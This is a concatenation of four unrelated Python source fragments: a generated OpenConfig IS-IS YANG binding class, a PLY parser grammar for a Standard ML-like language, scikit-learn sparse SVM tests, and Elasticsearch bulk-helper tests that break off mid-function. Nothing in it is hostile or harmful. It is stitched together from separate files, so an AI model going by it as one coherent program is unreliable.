                setmethod = getattr(self, "_set_%s" % e)
                if load is None:
                    setmethod(getattr(args[0], e))
                else:
                    setmethod(getattr(args[0], e), load=load)

    def _path(self):
        # Delegate upwards when attached to a parent container; otherwise
        # return this container's absolute YANG path.
        if hasattr(self, "_parent"):
            return self._parent._path() + [self._yang_name]
        else:
            return [
                "network-instances",
                "network-instance",
                "protocols",
                "protocol",
                "isis",
                "levels",
                "level",
                "link-state-database",
                "lsp",
                "tlvs",
                "tlv",
                "mt-isn",
                "neighbors",
                "neighbor",
                "subTLVs",
                "subTLVs",
                "max-reservable-link-bandwidth",
            ]

    def _get_state(self):
        """
        Getter method for state, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/levels/level/link_state_database/lsp/tlvs/tlv/mt_isn/neighbors/neighbor/subTLVs/subTLVs/max_reservable_link_bandwidth/state (container)

        YANG Description: State parameters of sub-TLV 10.
        """
        return self.__state

    def _set_state(self, v, load=False):
        """
        Setter method for state, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/levels/level/link_state_database/lsp/tlvs/tlv/mt_isn/neighbors/neighbor/subTLVs/subTLVs/max_reservable_link_bandwidth/state (container)
        If this variable is read-only (config: false) in the
        source YANG file, then _set_state is considered as a private
        method. Backends looking to populate this variable should
        do so via calling thisObj._set_state() directly.

        YANG Description: State parameters of sub-TLV 10.
        """
        # Unwrap a previously-wrapped value back to its underlying type
        # before re-wrapping it with this container's metadata.
        if hasattr(v, "_utype"):
            v = v._utype(v)
        try:
            t = YANGDynClass(
                v,
                base=state.state,
                is_container="container",
                yang_name="state",
                parent=self,
                path_helper=self._path_helper,
                extmethods=self._extmethods,
                register_paths=True,
                extensions=None,
                namespace="http://openconfig.net/yang/network-instance",
                defining_module="openconfig-network-instance",
                yang_type="container",
                is_config=False,
            )
        except (TypeError, ValueError):
            raise ValueError(
                {
                    "error-string": """state must be of a type compatible with container""",
                    "defined-type": "container",
                    "generated-type": """YANGDynClass(base=state.state, is_container='container', yang_name="state", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='container', is_config=False)""",
                }
            )

        self.__state = t
        # Notify the parent wrapper (if any) that this container changed.
        if hasattr(self, "_set"):
            self._set()

    def _unset_state(self):
        # Restore the element to a fresh, unset default container.
        self.__state = YANGDynClass(
            base=state.state,
            is_container="container",
            yang_name="state",
            parent=self,
            path_helper=self._path_helper,
            extmethods=self._extmethods,
            register_paths=True,
            extensions=None,
            namespace="http://openconfig.net/yang/network-instance",
            defining_module="openconfig-network-instance",
            yang_type="container",
            is_config=False,
        )

    # Read-only property (config false in YANG) — no setter is exposed.
    state = __builtin__.property(_get_state)

    _pyangbind_elements = OrderedDict([("state", state)])
| |
from lexer import tokens
import ply.yacc as yacc
from ast import *
import ctypes
import colors
# Grammar start symbol handed to yacc.
start = 'dec'
# Nonzero enables verbose tracing of every reduction.
debug = 0
# Error-recovery strategy consumed by p_error (legend two lines below).
error_handle = 1
# Single-element list so p_error can flag a failed parse for callers.
errflag = [False]
# 0 Do Nothing; 1 discard the token; 2 discard the whole exp; 3 re-sim
# error_handle = str(sys.argv)
def p_error(p):
    """Yacc error callback: report the syntax error, then apply the
    recovery strategy selected by the module-level ``error_handle`` flag.

    ``p`` is the offending token, or ``None`` when the error is at EOF.
    Always sets ``errflag[0]`` so callers can tell the parse failed.
    """
    if p:
        print(colors.error("Syntax error near '%s' at line %d, %d" % (p.value, p.lineno, p.lexpos)))
    else:
        print(colors.error("Syntax error at EOF"))
    if error_handle == 1:
        # Discard just the offending token and resume.  Guard p: at EOF
        # there is no token, and p.value would raise AttributeError.
        if p is not None:
            print("Trying to discard the token '%s'" % p.value)
        yacc.errok()
    elif error_handle == 2:
        # Skip ahead to the next ';' and restart the parser, dropping the
        # whole broken sentence.
        if p is not None:
            print("Trying to discard the whole sentence which includes '%s'" % p.value)
        while 1:
            tok = yacc.token()  # Get the next token
            if not tok or tok.type == ';':
                break
        yacc.restart()
    elif error_handle == 3:
        # Strategy 3 is handled by the dedicated error productions instead.
        print(colors.error("It won't be fixed in p_error"))
    else:
        print(colors.error("Nothing would take place to fix the error"))
    errflag[0] = True
def p_program(p):
    """program : program ';' exp
        | program ';' dec
        | exp
        | dec
    """
    # A lone exp/dec seeds a fresh program list; otherwise extend the
    # program accumulated so far with the new item after the ';'.
    if debug: print(' PROGRAM')
    p[0] = [p[1]] if len(p) == 2 else p[1] + [p[3]]
# Constant literals: each rule wraps the lexed value in a typed Value node.
def p_cons_int(p):
    # noinspection PySingleQuotedDocstring
    """cons : INT_VAL"""
    if debug: print("int : ", p[1])
    p[0] = Value(value=p[1], tycon=int_type)
def p_cons_real(p):
    """cons : REAL_VAL"""
    if debug: print("real : ", p[1])
    # c_float round-trips the literal through single precision on purpose.
    p[0] = Value(value=ctypes.c_float(p[1]).value, tycon=real_type)
def p_cons_str(p):
    'cons : STRING_VAL'
    if debug: print("string : ", p[1])
    p[0] = Value(value=p[1], tycon=string_type)
def p_cons_char(p):
    'cons : CHAR_VAL'
    if debug: print('char : ', p[1])
    p[0] = Value(value=p[1], tycon=char_type)
# Identifiers: a vid is either a symbolic or an alphanumeric name.
def p_vid(p):
    """ vid : symbol
        | ALPHANUMERIC
    """
    if debug: print(" VID : ", p[1])
    p[0] = p[1]
def p_tycon(p):
    ''' tycon : vid
    '''
    if debug: print(" TYCON : ", p[1])
    p[0] = p[1]
def p_tyvar(p):
    ''' tyvar : "'" vid
    '''
    # Type variables keep their leading apostrophe (e.g. 'a).
    p[0] = "'" + p[2]
    if debug: print(" TYVAR : ", p[0])
def p_lab(p):
    ''' lab : vid
        | INT_VAL
    '''
    # Record labels may be numeric; normalise numeric labels to int.
    try:
        p[0] = int(p[1])
    except ValueError:
        p[0] = p[1]
    if debug: print(" LAB : ", p[0])
# (*---------------------------------------------------------------*)
# (* Pattern *)
# (*---------------------------------------------------------------*)
# atomic pattern
def p_atpat_wc(p):
    """atpat : '_'
        | cons """
    # '_' is the wildcard pattern; any constant becomes a constant pattern.
    if p[1] == '_':
        p[0] = Pattern(Value(wildcard=True))
    else:
        p[0] = Pattern(p[1])
def p_atpat_id(p):
    """atpat : vid
        | OP vid"""
    # Bare identifier pattern, optionally prefixed with the `op` keyword.
    if len(p) == 2:
        p[0] = Pattern(Value(id=p[1]))
    else:
        p[0] = Pattern(Value(id=p[2], op=True))
def p_atpat_r(p):
    """atpat : '{' '}'
        | '{' patrow '}' """
    # Record pattern: {} is the unit pattern, otherwise wrap the row list.
    if len(p) == 3:
        p[0] = Pattern(Unit())
    else:
        p[0] = Pattern(p[2])
def p_atpat(p):
    " atpat : '(' pat ')' "
    # A parenthesised pattern passes straight through.
    p[0] = p[2]
def p_patrow_seq(p):
    ''' patrow_seq : lab '=' pat
        | lab '=' pat ',' patrow
    '''
    # One or more `lab = pat` items collected into a list of RecordItem.
    if len(p) == 4:
        p[0] = [RecordItem(lab=p[1], value=p[3])]
    else:
        p[0] = [RecordItem(lab=p[1], value=p[3])] + p[5]
def p_patrow(p):
    ''' patrow : SUSPENSION
        | patrow_seq
    '''
    # "..." (SUSPENSION) is encoded as a single (None, None) RecordItem.
    if p[1] == "...":
        p[0] = [RecordItem(None, None)]
    else:
        p[0] = p[1]
def p_pat(p):
    ''' pat : atpat
        | OP vid atpat
        | vid atpat
        | pat vid pat
        | pat ':' ty
    '''
    if debug: print(" PAT ")
    if len(p) == 2:  # atpat
        p[0] = p[1]
    elif p[1] == "op":  # op vid atpat
        p[0] = Pattern(Value(vcon=p[2], value=p[3].value, op=True))
    elif len(p) == 3:  # vid atpat
        p[0] = Pattern((p[1], p[2]))  # or p[2].value with vcon = p[1]?
    elif p[2] == ':':  # pat : ty
        # Type-constrained pattern: push the annotation into the value.
        if isinstance(p[1].value, list):
            p[0] = Pattern(p[1].value, p[3])
        else:
            p[1].value.tycon = p[3]
            p[1].value.update()
            p[0] = Pattern(p[1].value)
    else:  # pat vid pat TODO
        # Infix constructor: build a two-field record carried by the vcon.
        p[0] = Pattern(Value(
            value=Value(
                value=[RecordItem(1, p[1].value), RecordItem(2, p[3].value)],
                tycon=TyCon(name="record")),
            vcon=p[2]))
# (*---------------------------------------------------------------*)
# (* type *)
# (*---------------------------------------------------------------*)
def p_ty(p):
    ''' ty : aty
        | ty POINT_TO ty
    '''
    # POINT_TO builds a function type "fn" from domain (p[1]) to codomain (p[3]).
    if len(p) == 2:
        p[0] = p[1]
    else:
        p[0] = TyCon([], "fn", 0, (p[1], p[3]))
def p_aty_con(p):
    ''' aty : tycon
        | aty tycon
        | '(' tyseq_l ')' tycon
    '''
    # Type-constructor application; primitive names resolve to their
    # predeclared TyCon objects first.
    if len(p) == 2:
        if p[1] in primative_tycon:
            p[0] = primative_tycon[p[1]]
        else:
            p[0] = TyCon(tyvar=[], name=p[1])
    elif len(p) == 3:
        p[0] = TyCon([p[1]], p[2], 1)
    else:
        p[0] = TyCon(p[2], p[4], len(p[2]))
def p_aty(p):
    ''' aty : tyvar
        | '(' ty ')'
        | '{' '}'
        | '{' tyrow '}'
    '''
    if debug: print(" TY ")
    # Atomic type: a type variable, a parenthesised type, or a record
    # type ({} is the unit type).
    if len(p) == 2:
        p[0] = p[1]
    elif p[1] == '(':
        p[0] = p[2]
    elif p[1] == '{':
        if len(p) == 3:
            p[0] = unit_type
        else:
            p[0] = p[2]
def p_tyrow(p):
    ''' tyrow : lab ':' ty
        | lab ':' ty ',' tyrow
    '''
    if debug: print(" TYROW : ", len(p))
    # Accumulate lab:ty fields into a single "record" TyCon.
    if len(p) == 4:
        p[0] = TyCon(type={p[1]: p[3]}, name='record')
    else:
        p[0] = p[5]
        p[0].type[p[1]] = p[3]
def p_tyseq_l(p):
    ''' tyseq_l : ty ',' ty
        | ty ',' tyseq_l
    '''
    if debug: print(" TYSEQ_LIST ")
    # Flatten the comma sequence into a plain Python list of types.
    p[0] = [p[1]] + (p[3] if type(p[3]) == list else [p[3]])
# (*---------------------------------------------------------------*)
# (* expression *)
# (*---------------------------------------------------------------*)
def p_atexp_c(p):
    ' atexp : cons '
    # Constant literal expression.
    p[0] = Expression("Constant", p[1])
def p_atexp_r(p):
    ''' atexp : '{' '}'
        | '{' exprow '}' '''
    # {} is the unit constant; otherwise a record expression.
    if len(p) == 3:
        p[0] = Expression("Constant", Value(tycon=unit_type))
    else:
        p[0] = Expression("Record", p[2])
def p_atexp(p):
    ''' atexp : vid
        | OP vid
        | LET decs IN exp END
        | LET decs IN exps END
        | '(' exp ')'
        | '(' exps ')'
    '''
    # Identifier (optionally op-prefixed), let-expression, or
    # parenthesised expression, distinguished by production length.
    if len(p) == 2:
        p[0] = Expression("App", Value(id=p[1]))
    elif len(p) == 3:
        p[0] = Expression("App", Value(id=p[2], op=True))
    elif len(p) == 6:
        p[0] = Expression("Let", (p[2], p[4]))
    else:
        p[0] = p[2]
def p_atexp_error1(p):
    ''' atexp : LET decs error IN exp END
        | LET decs error IN exps END
    '''
    # Recovery rule: salvage a let-expression whose decs tail was broken.
    if error_handle == 3:
        print("p_atexp_error1!")
    # Fixed index: the body expression is p[5]; p[4] is the IN keyword
    # token, which the original code mistakenly stored as the body.
    p[0] = Expression("Let", (p[2], p[5]))
def p_atexp_error2(p):
    ''' atexp : LET decs IN error exp END
        | LET decs IN error exps END
    '''
    # Recovery rule: error token between IN and the body expression.
    if error_handle == 3:
        print("p_atexp_error2!")
    # p[2] = decs, p[5] = body expression (p[4] is the error token).
    p[0] = Expression("Let", (p[2], p[5]))
def p_atexp_error3(p):
    ''' atexp : LET error decs IN exp END
        | LET error decs IN exps END
    '''
    # Recovery rule: error token right after LET.
    if error_handle == 3:
        # Fixed copy-pasted debug label (previously printed "error2").
        print("p_atexp_error3!")
    # p[3] = decs, p[5] = body expression (p[2] is the error token).
    p[0] = Expression("Let", (p[3], p[5]))
def p_exprow(p):
    ''' exprow : lab '=' exp
        | lab '=' exp ',' exprow
    '''
    if debug: print(" EXPROW ")
    # Collect `lab = exp` items into a list of RecordItem.
    if len(p) == 4:
        p[0] = [RecordItem(p[1], p[3])]
    else:
        p[0] = [RecordItem(p[1], p[3])] + p[5]
def p_exps(p):
    ''' exps : exp ';' exp
    '''
    # Base case of an expression sequence: exactly two expressions.
    p[0] = Expression("EXPS", [p[1], p[3]])
def p_exps_(p):
    ''' exps : exp ';' exps
    '''
    # Prepend onto an existing sequence (`reg` holds the expression list).
    p[0] = Expression("EXPS", [p[1]] + p[3].reg)
def p_exp(p):
    ''' exp : app_exp
        | '(' exps ')'
        | exp ':' ty
        | exp ANDALSO exp
        | exp ORELSE exp
        | CASE exp OF match
        | IF exp THEN exp ELSE exp
        | FN match
    '''
    # Three fixes versus the original:
    #   1. the dispatch chain was attached to `if debug:` as elif arms, so
    #      with debug enabled p[0] was never assigned;
    #   2. the '(' exps ')' alternative (len 4, p[1] == '(') had no arm;
    #   3. the IF alternative has len(p) == 7 — the old second
    #      `len(p) == 5` arm was unreachable (and indexed p[6] out of range).
    if debug:
        print(" EXP ")
    if len(p) == 2:
        # app_exp: a singleton application collapses to its sole expression.
        if len(p[1]) == 1:
            p[0] = p[1][0]
        else:
            p[0] = Expression("App", p[1])
    elif len(p) == 3:
        p[0] = Expression("Fn", p[2])
    elif p[1] == '(':
        # Parenthesised expression sequence passes straight through.
        p[0] = p[2]
    elif p[2] == ':':
        p[0] = Expression("Constraint", (p[1], p[3]))
    elif p[2] == "andalso":
        p[0] = Expression("Andalso", (p[1], p[3]))
    elif p[2] == "orelse":
        p[0] = Expression("Orelse", (p[1], p[3]))
    elif len(p) == 5:
        p[0] = Expression("Case", (p[2], p[4]))
    elif len(p) == 7:
        p[0] = Expression("If", (p[2], p[4], p[6]))
def p_app_exp(p):
    ''' app_exp : atexp app_exp1
    '''
    # | vid app_exp1
    # Build the application spine as a flat list of atomic expressions.
    p[0] = [p[1]] + p[2]
def p_app_exp1(p):
    ''' app_exp1 : empty
        | app_exp
    '''
    # Either nothing ([] from `empty`) or the rest of the spine.
    p[0] = p[1]
# (*---------------------------------------------------------------*)
# (* declaration *)
# (*---------------------------------------------------------------*)
def p_match(p):
    ''' match : mrule
        | mrule '|' match
    '''
    if debug: print(" MATCH ")
    # One or more '|'-separated rules, flattened into a list.
    if len(p) == 2:
        p[0] = [p[1]]
    else:
        p[0] = [p[1]] + p[3]
def p_mrule(p):
    ''' mrule : pat LEAD_TO exp
    '''
    if debug: print(" MRULE ")
    # A single (pattern, body) match rule.
    p[0] = (p[1], p[3])
def p_decs(p):
    ''' decs : empty
        | dec decs
        | dec ';' decs
    '''
    if debug: print(" DECS ")
    # Possibly-empty declaration list; the ';' separator is optional.
    if len(p) == 2:
        p[0] = []
    elif len(p) == 3:
        p[0] = [p[1]] + p[2]
    else:
        p[0] = [p[1]] + p[3]
def p_dec(p):
    ''' dec : VAL valbind
        | TYPE typbind
        | DATATYPE datbind
    '''
    # Every alternative wraps its binding the same way, keyed by the
    # leading keyword value ("val" / "type" / "datatype"), so a single
    # assignment covers all three productions.
    if debug: print(" DEC ", p[1])
    p[0] = Declaration(p[1], p[2])
def p_valbind(p):
    ''' valbind : pat '=' exp
        | REC fvalbind
    '''
    if debug: print(" VALBIND ")
    # len 3: REC fvalbind — reuse the inner binding, marked recursive.
    # len 4: plain `pat = exp` binding.
    if len(p) == 3:
        p[0] = p[2]
        p[0].rec = True
    elif len(p) == 4:
        p[0] = valbind(p[1], p[3])
def p_fvalbind(p):
    ''' fvalbind : pat '=' FN match
    '''
    # Function binding: the bound value is always a Fn expression.
    p[0] = valbind(p[1], Expression("Fn", p[4]))
def p_typbind(p):
    ''' typbind : tyvarseq tycon '=' ty
        | tycon '=' ty
    '''
    if debug: print(" TYPBIND ")
    # Type abbreviation, with or without leading type variables.
    if len(p) == 4:
        p[0] = typbind([], p[1], p[3])
    elif len(p) == 5:
        p[0] = typbind(p[1], p[2], p[4])
def p_datbind(p):
    ''' datbind : tyvarseq tycon '=' conbind
        | tycon '=' conbind
    '''
    if debug: print(" DATBIND ")
    # Datatype declaration, with or without leading type variables.
    if len(p) == 4:
        p[0] = datbind([], p[1], p[3])
    elif len(p) == 5:
        p[0] = datbind(p[1], p[2], p[4])
def p_conbind(p):
    ''' conbind : vid connext
        | vid OF ty connext
    '''
    if debug: print(" CONBIND ")
    # Constructor list; nullary constructors carry unit_type.
    if len(p) == 3:
        p[0] = [(Value(id=p[1], op=False), unit_type)] + p[2]
    else:
        p[0] = [(Value(id=p[1], op=False), p[3])] + p[4]
def p_conbind_op(p):
    ''' conbind : OP vid connext
        | OP vid OF ty connext
    '''
    # Constructor binding with an explicit `op` prefix.  Fixed indices:
    # the constructor name is p[2] (p[1] is the OP keyword itself), the
    # carried type is p[4], and the connext tail is p[3] / p[5].  The
    # original used p[1] as the id and `+ p[2]` / `+ p[4]`, which
    # concatenated a list with the vid string (TypeError) in the len-4 case.
    if debug: print(" CONBIND ")
    if len(p) == 4:
        # OP vid connext: nullary constructor, carries unit.
        p[0] = [(Value(id=p[2], op=True), unit_type)] + p[3]
    else:
        # OP vid OF ty connext: constructor carrying a value of type p[4].
        p[0] = [(Value(id=p[2], op=True), p[4])] + p[5]
def p_connext(p):
    ''' connext : empty
        | '|' conbind
    '''
    # Tail of a constructor list: nothing (empty reduces to []) or the
    # conbind that follows the '|'.
    if debug: print(" CONNEXT ")
    p[0] = p[1] if len(p) == 2 else p[2]
# (*---------------------------------------------------------------*)
# (* type *)
# (*---------------------------------------------------------------*)
def p_tyvarseq(p):
    ''' tyvarseq : tyvar
        | '(' tyvarseq_l ')'
    '''
    if debug: print(" TYVARSEQ ", len(p))
    # A single tyvar or a parenthesised comma-list; always yields a list.
    if len(p) == 2:
        p[0] = [p[1]]
    else:
        p[0] = p[2]
def p_tyvarseq_l(p):
    ''' tyvarseq_l : tyvar
        | tyvar ',' tyvarseq_l
    '''
    if debug: print(" TYVARSEQ_L ")
    # Right-recursive comma list flattened into a Python list.
    if len(p) == 2:
        p[0] = [p[1]]
    else:
        p[0] = [p[1]] + p[3]
def p_empty(p):
    'empty : '
    if debug: print(" EMPTY ")
    # The empty production reduces to an empty list.
    p[0] = []
def p_symbol(p):
    '''symbol : SYMBOLIC
        | '+'
        | '-'
        | '*'
        | '/'
        | '^'
        | '#'
    '''
    # Pass the matched symbol token straight through.
    if debug: print(' symbol ')
    p[0] = p[1]
# Build the LALR parser; silence yacc's error log unless debugging.
parser = yacc.yacc(debug=True) if debug else yacc.yacc(debug=False, errorlog=yacc.NullLogger())
| |
import warnings
import numpy as np
from scipy import sparse
from sklearn import datasets, svm, linear_model, base
from numpy.testing import assert_array_almost_equal, \
assert_array_equal, assert_equal
from nose.tools import assert_raises, assert_true
from nose.tools import assert_equal as nose_assert_equal
from sklearn.datasets.samples_generator import make_classification
from sklearn.svm.tests import test_svm
from sklearn.utils import ConvergenceWarning
from sklearn.utils.extmath import safe_sparse_dot
# test sample 1
# Two linearly separable classes in 2-D; T / true_result are probe points.
X = np.array([[-2, -1], [-1, -1], [-1, -2], [1, 1], [1, 2], [2, 1]])
X_sp = sparse.lil_matrix(X)  # same data in sparse (LIL) form
Y = [1, 1, 1, 2, 2, 2]
T = np.array([[-1, -1], [2, 2], [3, 2]])
true_result = [1, 2, 2]
# test sample 2
# Three classes in 3-D, stored sparsely as a DOK matrix.
X2 = np.array([[0, 0, 0], [1, 1, 1], [2, 0, 0, ],
               [0, 0, 2], [3, 3, 3]])
X2_sp = sparse.dok_matrix(X2)
Y2 = [1, 2, 2, 2, 3]
T2 = np.array([[-1, -1, -1], [1, 1, 1], [2, 2, 2]])
true_result2 = [1, 2, 3]
iris = datasets.load_iris()
# permute
# Shuffle samples with a fixed seed so every test run is deterministic.
rng = np.random.RandomState(0)
perm = rng.permutation(iris.target.size)
iris.data = iris.data[perm]
iris.target = iris.target[perm]
# sparsify
iris.data = sparse.csr_matrix(iris.data)
def test_svc():
    """Check that sparse SVC gives the same result as SVC"""
    # Fit the same problem on dense and sparse input and compare models.
    clf = svm.SVC(kernel='linear', probability=True).fit(X, Y)
    sp_clf = svm.SVC(kernel='linear', probability=True).fit(X_sp, Y)
    assert_array_equal(sp_clf.predict(T), true_result)
    # The fitted attributes stay sparse when the input was sparse.
    assert_true(sparse.issparse(sp_clf.support_vectors_))
    assert_array_almost_equal(clf.support_vectors_,
                              sp_clf.support_vectors_.todense())
    assert_true(sparse.issparse(sp_clf.dual_coef_))
    assert_array_almost_equal(clf.dual_coef_, sp_clf.dual_coef_.todense())
    assert_true(sparse.issparse(sp_clf.coef_))
    assert_array_almost_equal(clf.coef_, sp_clf.coef_.todense())
    assert_array_almost_equal(clf.predict(T), sp_clf.predict(T))
    # refit with a different dataset
    clf.fit(X2, Y2)
    sp_clf.fit(X2_sp, Y2)
    assert_array_almost_equal(clf.support_vectors_,
                              sp_clf.support_vectors_.todense())
    assert_array_almost_equal(clf.dual_coef_, sp_clf.dual_coef_.todense())
    assert_array_almost_equal(clf.coef_, sp_clf.coef_.todense())
    assert_array_almost_equal(clf.predict(T2), sp_clf.predict(T2))
    assert_array_almost_equal(clf.predict_proba(T2), sp_clf.predict_proba(T2), 4)
def test_svc_with_custom_kernel():
    """Check that a callable kernel reproduces the built-in linear kernel."""
    # PEP 8 (E731): use a named def instead of binding a lambda to a name.
    def kfunc(x, y):
        # A plain dot product is exactly the linear kernel on sparse input.
        return safe_sparse_dot(x, y.T)
    clf_lin = svm.SVC(kernel='linear').fit(X_sp, Y)
    clf_mylin = svm.SVC(kernel=kfunc).fit(X_sp, Y)
    assert_array_equal(clf_lin.predict(X_sp), clf_mylin.predict(X_sp))
def test_svc_iris():
    """Test the sparse SVC with the iris dataset"""
    # Dense and sparse fits must agree for every kernel.
    for k in ('linear', 'poly', 'rbf'):
        sp_clf = svm.SVC(kernel=k).fit(iris.data, iris.target)
        clf = svm.SVC(kernel=k).fit(iris.data.todense(), iris.target)
        assert_array_almost_equal(clf.support_vectors_,
                                  sp_clf.support_vectors_.todense())
        assert_array_almost_equal(clf.dual_coef_, sp_clf.dual_coef_.todense())
        assert_array_almost_equal(
            clf.predict(iris.data.todense()), sp_clf.predict(iris.data))
        # coef_ only exists for the linear kernel.
        if k == 'linear':
            assert_array_almost_equal(clf.coef_, sp_clf.coef_.todense())
def test_error():
    """
    Test that it gives proper exception on deficient input
    """
    # impossible value of C
    assert_raises(ValueError, svm.SVC(C=-1).fit, X, Y)
    # impossible value of nu
    nu_clf = svm.NuSVC(nu=0.0)
    assert_raises(ValueError, nu_clf.fit, X_sp, Y)
    # Label vector of the wrong length (renamed so the local no longer
    # shadows the module-level Y2 fixture).
    truncated_labels = Y[:-1]
    assert_raises(ValueError, nu_clf.fit, X_sp, truncated_labels)
    # A well-formed problem still trains and predicts correctly.
    good_clf = svm.SVC()
    good_clf.fit(X_sp, Y)
    assert_array_equal(good_clf.predict(T), true_result)
def test_linearsvc():
    """
    Similar to test_SVC
    """
    # Dense vs sparse LinearSVC on both sample sets.
    clf = svm.LinearSVC().fit(X, Y)
    sp_clf = svm.LinearSVC().fit(X_sp, Y)
    assert_true(sp_clf.fit_intercept)
    assert_array_almost_equal(clf.raw_coef_, sp_clf.raw_coef_, decimal=4)
    assert_array_almost_equal(clf.predict(X), sp_clf.predict(X_sp))
    clf.fit(X2, Y2)
    sp_clf.fit(X2_sp, Y2)
    assert_array_almost_equal(clf.raw_coef_, sp_clf.raw_coef_, decimal=4)
def test_linearsvc_iris():
    """Test the sparse LinearSVC with the iris dataset"""
    sp_clf = svm.LinearSVC().fit(iris.data, iris.target)
    clf = svm.LinearSVC().fit(iris.data.todense(), iris.target)
    assert_equal(clf.fit_intercept, sp_clf.fit_intercept)
    # liblinear is only near-deterministic; compare coarsely (1 decimal).
    assert_array_almost_equal(clf.raw_coef_, sp_clf.raw_coef_, decimal=1)
    assert_array_almost_equal(
        clf.predict(iris.data.todense()), sp_clf.predict(iris.data))
    # check decision_function
    # argmax over the per-class scores must reproduce predict().
    pred = np.argmax(sp_clf.decision_function(iris.data), 1)
    assert_array_almost_equal(pred, clf.predict(iris.data.todense()))
def test_weight():
    """
    Test class weights
    """
    X_, y_ = make_classification(n_samples=200, n_features=100,
                                 weights=[0.833, 0.167], random_state=0)
    X_ = sparse.csr_matrix(X_)
    estimators = (linear_model.LogisticRegression(),
                  svm.LinearSVC(),
                  svm.SVC())
    for clf in estimators:
        # Heavily over-weight class 0 and check accuracy on the held-out
        # tail of the dataset.
        clf.set_params(class_weight={0: 5})
        clf.fit(X_[:180], y_[:180])
        y_pred = clf.predict(X_[180:])
        assert_true(np.sum(y_pred == y_[180:]) >= 11)
def test_sample_weights():
    """
    Test weights on individual samples
    """
    clf = svm.SVC()
    clf.fit(X_sp, Y)
    assert_array_equal(clf.predict(X[2]), [1.])
    # Up-weighting the last three samples flips the prediction for X[2].
    weights = [.1, .1, .1, 10, 10, 10]
    clf.fit(X_sp, Y, sample_weight=weights)
    assert_array_equal(clf.predict(X[2]), [2.])
def test_sparse_liblinear_intercept_handling():
    """
    Test that sparse liblinear honours intercept_scaling param
    """
    # Reuse the dense-input test, parametrized with LinearSVC (which also
    # accepts sparse input), so both code paths honour intercept_scaling.
    test_svm.test_dense_liblinear_intercept_handling(svm.LinearSVC)
def test_sparse_realdata():
    """
    Test on a subset from the 20newsgroups dataset.

    This catches some bugs if input is not correctly converted into
    sparse format or weights are not correctly initialized.
    """
    # Hand-extracted CSR fragment of the real dataset: 4 non-zero values
    # spread over ~80 rows.
    data = np.array([0.03771744, 0.1003567, 0.01174647, 0.027069])
    indices = np.array([6, 5, 35, 31])
    indptr = np.array(
        [0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
         1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 2, 2, 2, 2, 2,
         2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2,
         2, 2, 2, 2, 2, 2, 2, 2, 2, 4, 4, 4])
    X = sparse.csr_matrix((data, indices, indptr))
    y = np.array(
        [1., 0., 2., 2., 1., 1., 1., 2., 2., 0., 1., 2., 2.,
         0., 2., 0., 3., 0., 3., 0., 1., 1., 3., 2., 3., 2.,
         0., 3., 1., 0., 2., 1., 2., 0., 1., 0., 2., 3., 1.,
         3., 0., 1., 0., 0., 2., 0., 1., 2., 2., 2., 3., 2.,
         0., 3., 2., 1., 2., 3., 2., 2., 0., 1., 0., 1., 2.,
         3., 0., 0., 2., 2., 1., 3., 1., 1., 0., 1., 2., 1.,
         1., 3.])
    # Dense fit and sparse (COO-input) fit must find the same solution.
    clf = svm.SVC(kernel='linear').fit(X.todense(), y)
    sp_clf = svm.SVC(kernel='linear').fit(sparse.coo_matrix(X), y)
    assert_array_equal(clf.support_vectors_, sp_clf.support_vectors_.todense())
    assert_array_equal(clf.dual_coef_, sp_clf.dual_coef_.todense())
def test_sparse_svc_clone_with_callable_kernel():
    # The deprecated sparse.SVC class must refuse callable ("sparse")
    # kernels with a ValueError.
    with warnings.catch_warnings(record=True):
        sp = svm.sparse.SVC(C=1, kernel=lambda x, y: x * y.T, probability=True)
    assert_raises(ValueError, sp.fit, X_sp, Y)
    # A cloned svm.SVC with a callable kernel falls back to "dense_fit" on
    # sparse input, so fit / predict / predict_proba all work.
    proto = svm.SVC(C=1, kernel=lambda x, y: x * y.T, probability=True)
    cloned = base.clone(proto)
    cloned.fit(X_sp, Y)
    pred = cloned.predict(X_sp)
    cloned.predict_proba(X_sp)
    dense_svm = svm.SVC(C=1, kernel=lambda x, y: np.dot(x, y.T),
                        probability=True)
    pred_dense = dense_svm.fit(X, Y).predict(X)
    assert_array_equal(pred_dense, pred)
    # cloned.decision_function(X_sp)  # XXX : should be supported
def test_timeout():
    # With max_iter=1 the solver cannot converge, so fitting must emit
    # exactly one ConvergenceWarning.
    clf = svm.SVC(C=1, kernel=lambda x, y: x * y.T, probability=True,
                  max_iter=1)
    with warnings.catch_warnings(record=True) as caught:
        clf.fit(X_sp, Y)
    nose_assert_equal(len(caught), 1,
                      msg=caught)
    nose_assert_equal(caught[0].category, ConvergenceWarning,
                      msg=caught[0].category)
if __name__ == '__main__':
    # Allow running this test module directly through the nose runner.
    import nose
    nose.runmodule()
| |
from elasticsearch import helpers, TransportError
from . import ElasticsearchTestCase
from ..test_cases import SkipTest
class FailingBulkClient(object):
    """Proxy around a real client whose ``bulk`` call raises on the n-th call.

    ``fail_at`` is the zero-based index of the ``bulk`` invocation that will
    raise a synthetic ``TransportError(599)``; every other call is delegated
    to the wrapped client unchanged.
    """
    def __init__(self, client, fail_at=1):
        self.client = client
        self._called = -1
        self._fail_at = fail_at
        self.transport = client.transport
    def bulk(self, *args, **kwargs):
        # Count invocations; delegate unless this is the designated failure.
        self._called += 1
        if self._called != self._fail_at:
            return self.client.bulk(*args, **kwargs)
        raise TransportError(599, "Error!", {})
class TestStreamingBulk(ElasticsearchTestCase):
    """Integration tests for ``helpers.streaming_bulk``."""
    # Note: ``assertEquals`` is a deprecated alias of ``assertEqual``;
    # the canonical spelling is used throughout.
    def test_actions_remain_unchanged(self):
        # streaming_bulk must not mutate the action dicts handed to it.
        actions = [{'_id': 1}, {'_id': 2}]
        for ok, item in helpers.streaming_bulk(self.client, actions, index='test-index', doc_type='answers'):
            self.assertTrue(ok)
        self.assertEqual([{'_id': 1}, {'_id': 2}], actions)
    def test_all_documents_get_inserted(self):
        docs = [{"answer": x, '_id': x} for x in range(100)]
